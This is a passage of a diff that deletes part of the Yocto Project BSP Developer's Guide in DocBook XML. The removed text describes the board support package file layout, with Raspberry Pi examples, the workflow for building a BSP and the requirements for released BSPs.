-     meta-raspberrypi/recipes-kernel/linux-firmware/linux-firmware_%.bbappend
-     meta-raspberrypi/recipes-kernel/linux
-     meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi-dev.bb
-     meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi.inc
-     meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi_4.14.bb
-     meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi_4.9.bb
-     meta-raspberrypi/recipes-multimedia
-     meta-raspberrypi/recipes-multimedia/gstreamer
-     meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx
-     meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx/*.patch
-     meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx_%.bbappend
-     meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_%.bbappend
-     meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx-1.12
-     meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx-1.12/*.patch
-     meta-raspberrypi/recipes-multimedia/omxplayer
-     meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer
-     meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer/*.patch
-     meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer_git.bb
-     meta-raspberrypi/recipes-multimedia/x264
-     meta-raspberrypi/recipes-multimedia/x264/x264_git.bbappend
-     meta-raspberrypi/wic
-     meta-raspberrypi/wic/sdimage-raspberrypi.wks
-        </literallayout>
-    </para>
-
-    <para>
-        The following sections describe each part of the proposed
-        BSP format.
-    </para>
-
-    <section id="bsp-filelayout-license">
-        <title>License Files</title>
-
-        <para>
-            You can find these files in the BSP Layer at:
-            <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>/<replaceable>bsp_license_file</replaceable>
-            </literallayout>
-        </para>
-
-        <para>
-            These optional files satisfy licensing requirements
-            for the BSP.
-            The type or types of files here can vary depending
-            on the licensing requirements.
-            For example, in the Raspberry Pi BSP, all licensing
-            requirements are handled with the
-            <filename>COPYING.MIT</filename> file.
-        </para>
-
-        <para>
-            Licensing files can be MIT, BSD, GPLv*, and so forth.
-            These files are recommended for the BSP but are
-            optional and totally up to the BSP developer.
-            For information on how to maintain license
-            compliance, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
-            section in the Yocto Project Development Tasks
-            Manual.
-        </para>
-    </section>
-
-    <section id="bsp-filelayout-readme">
-        <title>README File</title>
-
-        <para>
-            You can find this file in the BSP Layer at:
-            <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>/README
-            </literallayout>
-        </para>
-
-        <para>
-            This file provides information on how to boot the live
-            images that are optionally included in the
-            <filename>binary/</filename> directory.
-            The <filename>README</filename> file also provides
-            information needed for building the image.
-        </para>
-
-        <para>
-            At a minimum, the <filename>README</filename> file must
-            contain a list of dependencies, such as the names of
-            any other layers on which the BSP depends and the name of
-            the BSP maintainer with his or her contact information.
-        </para>
-    </section>
-
-    <section id="bsp-filelayout-readme-sources">
-        <title>README.sources File</title>
-
-        <para>
-            You can find this file in the BSP Layer at:
-            <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>/README.sources
-            </literallayout>
-        </para>
-
-        <para>
-            This file provides information on where to locate the BSP
-            source files used to build the images (if any) that
-            reside in
-            <filename>meta-<replaceable>bsp_root_name</replaceable>/binary</filename>.
-            Images in the <filename>binary</filename> would be images
-            released with the BSP.
-            The information in the <filename>README.sources</filename>
-            file also helps you find the
-            <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>
-            used to generate the images that ship with the BSP.
-            <note>
-                If the BSP's <filename>binary</filename> directory is
-                missing or the directory has no images, an existing
-                <filename>README.sources</filename> file is
-                meaningless and usually does not exist.
-            </note>
-        </para>
-    </section>
-
-    <section id="bsp-filelayout-binary">
-        <title>Pre-built User Binaries</title>
-
-        <para>
-            You can find these files in the BSP Layer at:
-            <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>/binary/<replaceable>bootable_images</replaceable>
-            </literallayout>
-        </para>
-
-        <para>
-            This optional area contains useful pre-built kernels
-            and user-space filesystem images released with the
-            BSP that are appropriate to the target system.
-            This directory typically contains graphical (e.g. Sato)
-            and minimal live images when the BSP tarball has been
-            created and made available in the
-            <ulink url='&YOCTO_HOME_URL;'>Yocto Project</ulink>
-            website.
-            You can use these kernels and images to get a system
-            running and quickly get started on development tasks.
-        </para>
-
-        <para>
-            The exact types of binaries present are highly
-            hardware-dependent.
-            The
-            <link linkend='bsp-filelayout-readme'><filename>README</filename></link>
-            file should be present in the BSP Layer and it
-            explains how to use the images with the target hardware.
-            Additionally, the
-            <link linkend='bsp-filelayout-readme-sources'><filename>README.sources</filename></link>
-            file should be present to locate the sources used to
-            build the images and provide information on the
-            Metadata.
-        </para>
-    </section>
-
-    <section id='bsp-filelayout-layer'>
-        <title>Layer Configuration File</title>
-
-        <para>
-            You can find this file in the BSP Layer at:
-            <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>/conf/layer.conf
-            </literallayout>
-        </para>
-
-        <para>
-            The <filename>conf/layer.conf</filename> file
-            identifies the file structure as a layer,
-            identifies the contents of the layer, and
-            contains information about how the build system should
-            use it.
-            Generally, a standard boilerplate file such as the
-            following works.
-            In the following example, you would replace
-            <replaceable>bsp</replaceable> with the actual
-            name of the BSP (i.e.
-            <replaceable>bsp_root_name</replaceable> from the example
-            template).
-        </para>
-
-        <para>
-            <literallayout class='monospaced'>
-     # We have a conf and classes directory, add to BBPATH
-     BBPATH .= ":${LAYERDIR}"
-
-     # We have a recipes directory, add to BBFILES
-     BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
-                 ${LAYERDIR}/recipes-*/*/*.bbappend"
-
-     BBFILE_COLLECTIONS += "<replaceable>bsp</replaceable>"
-     BBFILE_PATTERN_<replaceable>bsp</replaceable> = "^${LAYERDIR}/"
-     BBFILE_PRIORITY_<replaceable>bsp</replaceable> = "6"
-
-     LAYERDEPENDS_<replaceable>bsp</replaceable> = "intel"
-            </literallayout>
-        </para>
-
-        <para>
-            To illustrate the string substitutions, here are
-            the corresponding statements from the Raspberry
-            Pi <filename>conf/layer.conf</filename> file:
-            <literallayout class='monospaced'>
-     # We have a conf and classes directory, append to BBPATH
-     BBPATH .= ":${LAYERDIR}"
-
-     # We have a recipes directory containing .bb and .bbappend files, add to BBFILES
-     BBFILES += "${LAYERDIR}/recipes*/*/*.bb \
-                 ${LAYERDIR}/recipes*/*/*.bbappend"
-
-     BBFILE_COLLECTIONS += "raspberrypi"
-     BBFILE_PATTERN_raspberrypi := "^${LAYERDIR}/"
-     BBFILE_PRIORITY_raspberrypi = "9"
-
-     # Additional license directories.
-     LICENSE_PATH += "${LAYERDIR}/files/custom-licenses"
-          .
-          .
-          .
-            </literallayout>
-        </para>
-
-        <para>
-            This file simply makes
-            <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
-            aware of the recipes and configuration directories.
-            The file must exist so that the OpenEmbedded build system
-            can recognize the BSP.
-        </para>
-    </section>
-
-    <section id="bsp-filelayout-machine">
-        <title>Hardware Configuration Options</title>
-
-        <para>
-            You can find these files in the BSP Layer at:
-            <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>/conf/machine/*.conf
-            </literallayout>
-        </para>
-
-        <para>
-            The machine files bind together all the information
-            contained elsewhere in the BSP into a format that
-            the build system can understand.
-            Each BSP Layer requires at least one machine file.
-            If the BSP supports multiple machines, multiple
-            machine configuration files can exist.
-            These filenames correspond to the values to which
-            users have set the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink> variable.
-        </para>
-
-        <para>
-            These files define things such as the kernel package
-            to use
-            (<ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></ulink>
-            of
-            <ulink url='&YOCTO_DOCS_DEV_URL;#metadata-virtual-providers'>virtual/kernel</ulink>),
-            the hardware drivers to include in different types
-            of images, any special software components that are
-            needed, any bootloader information, and also any
-            special image format requirements.
-        </para>
-
-        <para>
-            This configuration file could also include a hardware
-            "tuning" file that is commonly used to define the
-            package architecture and specify optimization flags,
-            which are carefully chosen to give best performance
-            on a given processor.
-        </para>
-
-        <para>
-            Tuning files are found in the
-            <filename>meta/conf/machine/include</filename>
-            directory within the
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-            For example, many <filename>tune-*</filename> files
-            (e.g. <filename>tune-arm1136jf-s.inc</filename>,
-            <filename>tune-1586-nlp.inc</filename>, and so forth)
-            reside in the
-            <filename>poky/meta/conf/machine/include</filename>
-            directory.
-        </para>
-
-        <para>
-            To use an include file, you simply include them in the
-            machine configuration file.
-            For example, the Raspberry Pi BSP
-            <filename>raspberrypi3.conf</filename> contains the
-            following statement:
-            <literallayout class='monospaced'>
-     include conf/machine/include/rpi-base.inc
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='bsp-filelayout-misc-recipes'>
-        <title>Miscellaneous BSP-Specific Recipe Files</title>
-
-        <para>
-            You can find these files in the BSP Layer at:
-            <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>/recipes-bsp/*
-            </literallayout>
-        </para>
-
-        <para>
-            This optional directory contains miscellaneous recipe
-            files for the BSP.
-            Most notably would be the formfactor files.
-            For example, in the Raspberry Pi BSP, there is the
-            <filename>formfactor_0.0.bbappend</filename> file,
-            which is an append file used to augment the recipe
-            that starts the build.
-            Furthermore, there are machine-specific settings used
-            during the build that are defined by the
-            <filename>machconfig</filename> file further down in
-            the directory.
-            Here is the <filename>machconfig</filename> file for
-            the Raspberry Pi BSP:
-            <literallayout class='monospaced'>
-     HAVE_TOUCHSCREEN=0
-     HAVE_KEYBOARD=1
-
-     DISPLAY_CAN_ROTATE=0
-     DISPLAY_ORIENTATION=0
-     DISPLAY_DPI=133
-            </literallayout>
-        </para>
-
-        <note><para>
-            If a BSP does not have a formfactor entry, defaults
-            are established according to the formfactor
-            configuration file that is installed by the main
-            formfactor recipe
-            <filename>meta/recipes-bsp/formfactor/formfactor_0.0.bb</filename>,
-            which is found in the
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-        </para></note>
-    </section>
-
-    <section id='bsp-filelayout-recipes-graphics'>
-        <title>Display Support Files</title>
-
-        <para>
-            You can find these files in the BSP Layer at:
-            <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>/recipes-graphics/*
-            </literallayout>
-        </para>
-
-        <para>
-            This optional directory contains recipes for the
-            BSP if it has special requirements for graphics
-            support.
-            All files that are needed for the BSP to support
-            a display are kept here.
-        </para>
-    </section>
-
-    <section id='bsp-filelayout-kernel'>
-        <title>Linux Kernel Configuration</title>
-
-        <para>
-            You can find these files in the BSP Layer at:
-            <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>/recipes-kernel/linux/linux*.bbappend
-     meta-<replaceable>bsp_root_name</replaceable>/recipes-kernel/linux/*.bb
-            </literallayout>
-        </para>
-
-        <para>
-            Append files (<filename>*.bbappend</filename>) modify
-            the main kernel recipe being used to build the image.
-            The <filename>*.bb</filename> files would be a
-            developer-supplied kernel recipe.
-            This area of the BSP hierarchy can contain both these
-            types of files although, in practice, it is likely that
-            you would have one or the other.
-        </para>
-
-        <para>
-            For your BSP, you typically want to use an existing Yocto
-            Project kernel recipe found in the
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-            at <filename>meta/recipes-kernel/linux</filename>.
-            You can append machine-specific changes to the
-            kernel recipe by using a similarly named append
-            file, which is located in the BSP Layer for your
-            target device (e.g. the
-            <filename>meta-<replaceable>bsp_root_name</replaceable>/recipes-kernel/linux</filename> directory).
-        </para>
-
-        <para>
-            Suppose you are using the
-            <filename>linux-yocto_4.4.bb</filename> recipe to
-            build the kernel.
-            In other words, you have selected the kernel in your
-            <replaceable>bsp_root_name</replaceable><filename>.conf</filename>
-            file by adding
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></ulink>
-            and
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></ulink>
-            statements as follows:
-            <literallayout class='monospaced'>
-     PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
-     PREFERRED_VERSION_linux-yocto ?= "4.4%"
-            </literallayout>
-            <note>
-                When the preferred provider is assumed by
-                default, the
-                <filename>PREFERRED_PROVIDER</filename>
-                statement does not appear in the
-                <replaceable>bsp_root_name</replaceable><filename>.conf</filename> file.
-            </note>
-            You would use the
-            <filename>linux-yocto_4.4.bbappend</filename>
-            file to append specific BSP settings to the kernel,
-            thus configuring the kernel for your particular BSP.
-        </para>
-
-        <para>
-            You can find more information on what your append file
-            should contain in the
-            "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#creating-the-append-file'>Creating the Append File</ulink>"
-            section in the Yocto Project Linux Kernel Development
-            Manual.
-        </para>
-
-        <para>
-            An alternate scenario is when you create your own
-            kernel recipe for the BSP.
-            A good example of this is the Raspberry Pi BSP.
-            If you examine the
-            <filename>recipes-kernel/linux</filename> directory
-            you see the following:
-            <literallayout class='monospaced'>
-     linux-raspberrypi-dev.bb
-     linux-raspberrypi.inc
-     linux-raspberrypi_4.14.bb
-     linux-raspberrypi_4.9.bb
-            </literallayout>
-            The directory contains three kernel recipes and a
-            common include file.
-        </para>
-    </section>
-</section>
-
-<section id='developing-a-board-support-package-bsp'>
-    <title>Developing a Board Support Package (BSP)</title>
-
-    <para>
-        This section describes the high-level procedure you can
-        follow to create a BSP.
-        Although not required for BSP creation, the
-        <filename>meta-intel</filename> repository, which
-        contains many BSPs supported by the Yocto Project,
-        is part of the example.
-    </para>
-
-    <para>
-        For an example that shows how to create a new
-        layer using the tools, see the
-        "<link linkend='creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a New BSP Layer Using the <filename>bitbake-layers</filename> Script</link>"
-        section.
-    </para>
-
-    <para>
-        The following illustration and list summarize the BSP
-        creation general workflow.
-    </para>
-
-    <para>
-        <imagedata fileref="figures/bsp-dev-flow.png" width="7in" depth="5in" align="center" scalefit="1" />
-    </para>
-
-    <para>
-        <orderedlist>
-            <listitem><para>
-                <emphasis>Set up Your Host Development System
-                to Support Development Using the Yocto
-                Project</emphasis>:
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
-                section in the Yocto Project Development Tasks
-                Manual for options on how to get a system ready
-                to use the Yocto Project.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Establish the
-                <filename>meta-intel</filename>
-                Repository on Your System:</emphasis>
-                Having local copies of these supported BSP layers
-                on your system gives you access to layers you
-                might be able to leverage when creating your BSP.
-                For information on how to get these files, see the
-                "<link linkend='preparing-your-build-host-to-work-with-bsp-layers'>Preparing Your Build Host to Work with BSP Layers</link>"
-                section.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Create Your Own BSP Layer Using the
-                <filename>bitbake-layers</filename>
-                Script:</emphasis>
-                Layers are ideal for isolating and storing work
-                for a given piece of hardware.
-                A layer is really just a location or area in which you
-                place the recipes and configurations for your BSP.
-                In fact, a BSP is, in itself, a special type of layer.
-                The simplest way to create a new BSP layer that is
-                compliant with the Yocto Project is to use the
-                <filename>bitbake-layers</filename> script.
-                For information about that script, see the
-                "<link linkend='creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a New BSP Layer Using the <filename>bitbake-layers</filename> Script</link>"
-                section.</para>
-
-                <para>Another example that illustrates a layer
-                is an application.
-                Suppose you are creating an application that has
-                library or other dependencies in order for it to
-                compile and run.
-                The layer, in this case, would be where all the
-                recipes that define those dependencies are kept.
-                The key point for a layer is that it is an
-                isolated area that contains all the relevant
-                information for the project that the
-                OpenEmbedded build system knows about.
-                For more information on layers, see the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>The Yocto Project Layer Model</ulink>"
-                section in the Yocto Project Overview and Concepts
-                Manual.
-                You can also reference the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-                section in the Yocto Project Development Tasks
-                Manual.
-                For more information on BSP layers, see the
-                "<link linkend='bsp-layers'>BSP Layers</link>"
-                section.
-                <note><title>Notes</title>
-                    <itemizedlist>
-                        <listitem><para>
-                            Five hardware reference BSPs exist
-                            that are part of the Yocto Project release
-                            and are located in the
-                            <filename>poky/meta-yocto-bsp</filename> BSP
-                            layer:
-                            <itemizedlist>
-                                <listitem><para>
-                                    Texas Instruments Beaglebone
-                                    (<filename>beaglebone-yocto</filename>)
-                                    </para></listitem>
-                                <listitem><para>
-                                    Ubiquiti Networks EdgeRouter Lite
-                                   (<filename>edgerouter</filename>)
-                                   </para></listitem>
-                                <listitem><para>
-                                    Two general IA platforms
-                                    (<filename>genericx86</filename> and
-                                    <filename>genericx86-64</filename>)
-                                    </para></listitem>
-                            </itemizedlist>
-                            </para></listitem>
-                        <listitem><para>
-                            Three core Intel BSPs exist as part of
-                            the Yocto Project release in the
-                            <filename>meta-intel</filename> layer:
-                            <itemizedlist>
-                                <listitem><para>
-                                    <filename>intel-core2-32</filename>,
-                                    which is a BSP optimized for the Core2
-                                    family of CPUs as well as all CPUs
-                                    prior to the Silvermont core.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <filename>intel-corei7-64</filename>,
-                                    which is a BSP optimized for Nehalem
-                                    and later Core and Xeon CPUs as well
-                                    as Silvermont and later Atom CPUs,
-                                    such as the Baytrail SoCs.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <filename>intel-quark</filename>,
-                                    which is a BSP optimized for the
-                                    Intel Galileo gen1 &amp; gen2
-                                    development boards.
-                                    </para></listitem>
-                            </itemizedlist>
-                            </para></listitem>
-                    </itemizedlist>
-                </note></para>
-
-                <para>When you set up a layer for a new BSP,
-                you should follow a standard layout.
-                This layout is described in the
-                "<link linkend='bsp-filelayout'>Example Filesystem Layout</link>"
-                section.
-                In the standard layout, notice the suggested
-                structure for recipes and configuration
-                information.
-                You can see the standard layout for a BSP
-                by examining any supported BSP found in the
-                <filename>meta-intel</filename> layer inside
-                the Source Directory.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Make Configuration Changes to Your New
-                BSP Layer:</emphasis>
-                The standard BSP layer structure organizes the
-                files you need to edit in
-                <filename>conf</filename> and several
-                <filename>recipes-*</filename> directories
-                within the BSP layer.
-                Configuration changes identify where your new
-                layer is on the local system and identifies the
-                kernel you are going to use.
-                When you run the
-                <filename>bitbake-layers</filename> script,
-                you are able to interactively configure many
-                things for the BSP (e.g. keyboard, touchscreen,
-                and so forth).
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Make Recipe Changes to Your New BSP
-                Layer:</emphasis>
-                Recipe changes include altering recipes
-                (<filename>*.bb</filename> files), removing
-                recipes you do not use, and adding new recipes
-                or append files (<filename>.bbappend</filename>)
-                that support your hardware.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Prepare for the Build:</emphasis>
-                Once you have made all the changes to your BSP
-                layer, there remains a few things you need to
-                do for the OpenEmbedded build system in order
-                for it to create your image.
-                You need to get the build environment ready by
-                sourcing an environment setup script
-                (i.e. <filename>oe-init-build-env</filename>)
-                and you need to be sure two key configuration
-                files are configured appropriately: the
-                <filename>conf/local.conf</filename> and the
-                <filename>conf/bblayers.conf</filename> file.
-                You must make the OpenEmbedded build system aware
-                of your new layer.
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-your-layer'>Enabling Your Layer</ulink>"
-                section in the Yocto Project Development Tasks Manual
-                for information on how to let the build system
-                know about your new layer.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Build the Image:</emphasis>
-                The OpenEmbedded build system uses the BitBake tool
-                to build images based on the type of image you want to
-                create.
-                You can find more information about BitBake in the
-                <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
-                </para>
-
-                <para>The build process supports several types of
-                images to satisfy different needs.
-                See the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
-                chapter in the Yocto Project Reference Manual for
-                information on supported images.
-                </para></listitem>
-        </orderedlist>
-    </para>
-</section>
-
-<section id='requirements-and-recommendations-for-released-bsps'>
-    <title>Requirements and Recommendations for Released BSPs</title>
-
-    <para>
-        Certain requirements exist for a released BSP to be
-        considered compliant with the Yocto Project.
-        Additionally, recommendations also exist.
-        This section describes the requirements and
-        recommendations for released BSPs.
-    </para>
-
-    <section id='released-bsp-requirements'>
-        <title>Released BSP Requirements</title>
-
-        <para>
-            Before looking at BSP requirements, you should consider
-            the following:
-            <itemizedlist>
-                <listitem><para>
-                    The requirements here assume the BSP layer
-                    is a well-formed, "legal" layer that can be
-                    added to the Yocto Project.
-                    For guidelines on creating a layer that meets
-                    these base requirements, see the
-                    "<link linkend='bsp-layers'>BSP Layers</link>"
-                    section in this manual and the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers"</ulink>"
-                    section in the Yocto Project Development Tasks
-                    Manual.
-                    </para></listitem>
-                <listitem><para>
-                    The requirements in this section apply
-                    regardless of how you package a BSP.
-                    You should consult the packaging and distribution
-                    guidelines for your specific release process.
-                    For an example of packaging and distribution
-                    requirements, see the
-                    "<ulink url='https://wiki.yoctoproject.org/wiki/Third_Party_BSP_Release_Process'>Third Party BSP Release Process</ulink>"
-                    wiki page.
-                    </para></listitem>
-                <listitem><para>
-                    The requirements for the BSP as it is made
-                    available to a developer are completely
-                    independent of the released form of the BSP.
-                    For example, the BSP Metadata can be contained
-                    within a Git repository and could have a directory
-                    structure completely different from what appears
-                    in the officially released BSP layer.
-                    </para></listitem>
-                <listitem><para>
-                    It is not required that specific packages or
-                    package modifications exist in the BSP layer,
-                    beyond the requirements for general
-                    compliance with the Yocto Project.
-                    For example, no requirement exists dictating
-                    that a specific kernel or kernel version be
-                    used in a given BSP.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            Following are the requirements for a released BSP
-            that conform to the Yocto Project:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Layer Name:</emphasis>
-                    The BSP must have a layer name that follows
-                    the Yocto Project standards.
-                    For information on BSP layer names, see the
-                    "<link linkend='bsp-layers'>BSP Layers</link>" section.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>File System Layout:</emphasis>
-                    When possible, use the same directory names
-                    in your BSP layer as listed in the
-                    <filename>recipes.txt</filename> file, which
-                    is found in <filename>poky/meta</filename>
-                    directory of the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                    or in the OpenEmbedded-Core Layer
-                    (<filename>openembedded-core</filename>) at
-                    <ulink url='http://git.openembedded.org/openembedded-core/tree/meta'></ulink>.
-                    </para>
-
-                    <para>You should place recipes
-                    (<filename>*.bb</filename> files) and recipe
-                    modifications (<filename>*.bbappend</filename>
-                    files) into <filename>recipes-*</filename>
-                    subdirectories by functional area as outlined
-                    in <filename>recipes.txt</filename>.
-                    If you cannot find a category in
-                    <filename>recipes.txt</filename> to fit a
-                    particular recipe, you can make up your own
-                    <filename>recipes-*</filename> subdirectory.
-                    </para>
-
-                    <para>Within any particular
-                    <filename>recipes-*</filename> category, the
-                    layout should match what is found in the
-                    OpenEmbedded-Core Git repository
-                    (<filename>openembedded-core</filename>)
-                    or the Source Directory (<filename>poky</filename>).
-                    In other words, make sure you place related
-                    files in appropriately-related
-                    <filename>recipes-*</filename> subdirectories
-                    specific to the recipe's function, or within
-                    a subdirectory containing a set of closely-related
-                    recipes.
-                    The recipes themselves should follow the general
-                    guidelines for recipes used in the Yocto Project
-                    found in the
-                    "<ulink url='http://openembedded.org/wiki/Styleguide'>OpenEmbedded Style Guide</ulink>".
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>License File:</emphasis>
-                    You must include a license file in the
-                    <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
-                    directory.
-                    This license covers the BSP Metadata as a whole.
-                    You must specify which license to use since no
-                    default license exists when one is not specified.
-                    See the
-                    <ulink url='&YOCTO_GIT_URL;/cgit.cgi/meta-raspberrypi/tree/COPYING.MIT'><filename>COPYING.MIT</filename></ulink>
-                    file for the Raspberry Pi BSP in the
-                    <filename>meta-raspberrypi</filename> BSP layer
-                    as an example.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>README File:</emphasis>
-                    You must include a <filename>README</filename>
-                    file in the
-                    <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
-                    directory.
-                    See the
-                    <ulink url='&YOCTO_GIT_URL;/cgit.cgi/meta-raspberrypi/tree/README.md'><filename>README.md</filename></ulink>
-                    file for the Raspberry Pi BSP in the
-                    <filename>meta-raspberrypi</filename> BSP layer
-                    as an example.</para>
-
-                    <para>At a minimum, the <filename>README</filename>
-                    file should contain the following:
-                    <itemizedlist>
-                        <listitem><para>
-                            A brief description of the target hardware.
-                            </para></listitem>
-                        <listitem><para>
-                            A list of all the dependencies of the BSP.
-                            These dependencies are typically a list
-                            of required layers needed to build the
-                            BSP.
-                            However, the dependencies should also
-                            contain information regarding any other
-                            dependencies the BSP might have.
-                            </para></listitem>
-                        <listitem><para>
-                            Any required special licensing information.
-                            For example, this information includes
-                            information on special variables needed
-                            to satisfy a EULA, or instructions on
-                            information needed to build or distribute
-                            binaries built from the BSP Metadata.
-                            </para></listitem>
-                        <listitem><para>
-                            The name and contact information for the
-                            BSP layer maintainer.
-                            This is the person to whom patches and
-                            questions should be sent.
-                            For information on how to find the right
-                            person, see the
-                            "<ulink url='&YOCTO_DOCS_DEV_URL;#how-to-submit-a-change'>Submitting a Change to the Yocto Project</ulink>"
-                            section in the Yocto Project Development
-                            Tasks Manual.
-                            </para></listitem>
-                        <listitem><para>
-                            Instructions on how to build the BSP using
-                            the BSP layer.
-                            </para></listitem>
-                        <listitem><para>
-                            Instructions on how to boot the BSP build
-                            from the BSP layer.
-                            </para></listitem>
-                        <listitem><para>
-                            Instructions on how to boot the binary
-                            images contained in the
-                            <filename>binary</filename> directory,
-                            if present.
-                            </para></listitem>
-                        <listitem><para>
-                            Information on any known bugs or issues
-                            that users should know about when either
-                            building or booting the BSP binaries.
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>README.sources File:</emphasis>
-                    If you BSP contains binary images in the
-                    <filename>binary</filename> directory, you must
-                    include a <filename>README.sources</filename>
-                    file in the
-                    <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
-                    directory.
-                    This file specifies exactly where you can find
-                    the sources used to generate the binary images.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Layer Configuration File:</emphasis>
-                    You must include a
-                    <filename>conf/layer.conf</filename> file in
-                    the
-                    <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
-                    directory.
-                    This file identifies the
-                    <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
-                    BSP layer as a layer to the build system.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Machine Configuration File:</emphasis>
-                    You must include one or more
-                    <filename>conf/machine/</filename><replaceable>bsp_root_name</replaceable><filename>.conf</filename>
-                    files in the
-                    <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
-                    directory.
-                    These configuration files define machine targets
-                    that can be built using the BSP layer.
-                    Multiple machine configuration files define
-                    variations of machine configurations that the
-                    BSP supports.
-                    If a BSP supports multiple machine variations,
-                    you need to adequately describe each variation
-                    in the BSP <filename>README</filename> file.
-                    Do not use multiple machine configuration files
-                    to describe disparate hardware.
-                    If you do have very different targets, you should
-                    create separate BSP layers for each target.
-                    <note>
-                        It is completely possible for a developer to
-                        structure the working repository as a
-                        conglomeration of unrelated BSP files, and to
-                        possibly generate BSPs targeted for release
-                        from that directory using scripts or some
-                        other mechanism
-                        (e.g. <filename>meta-yocto-bsp</filename> layer).
-                        Such considerations are outside the scope of
-                        this document.
-                    </note>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='released-bsp-recommendations'>
-        <title>Released BSP Recommendations</title>
-
-        <para>
-            Following are recommendations for released BSPs that
-            conform to the Yocto Project:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Bootable Images:</emphasis>
-                    Released BSPs can contain one or more bootable
-                    images.
-                    Including bootable images allows users to easily
-                    try out the BSP using their own hardware.</para>
-
-                    <para>In some cases, it might not be convenient
-                    to include a bootable image.
-                    If so, you might want to make two versions of the
-                    BSP available: one that contains binary images, and
-                    one that does not.
-                    The version that does not contain bootable images
-                    avoids unnecessary download times for users not
-                    interested in the images.</para>
-
-                    <para>If you need to distribute a BSP and include
-                    bootable images or build kernel and filesystems
-                    meant to allow users to boot the BSP for evaluation
-                    purposes, you should put the images and artifacts
-                    within a
-                    <filename>binary/</filename> subdirectory located
-                    in the
-                    <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
-                    directory.
-                    <note>
-                        If you do include a bootable image as part
-                        of the BSP and the image was built by software
-                        covered by the GPL or other open source licenses,
-                        it is your responsibility to understand
-                        and meet all licensing requirements, which could
-                        include distribution of source files.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
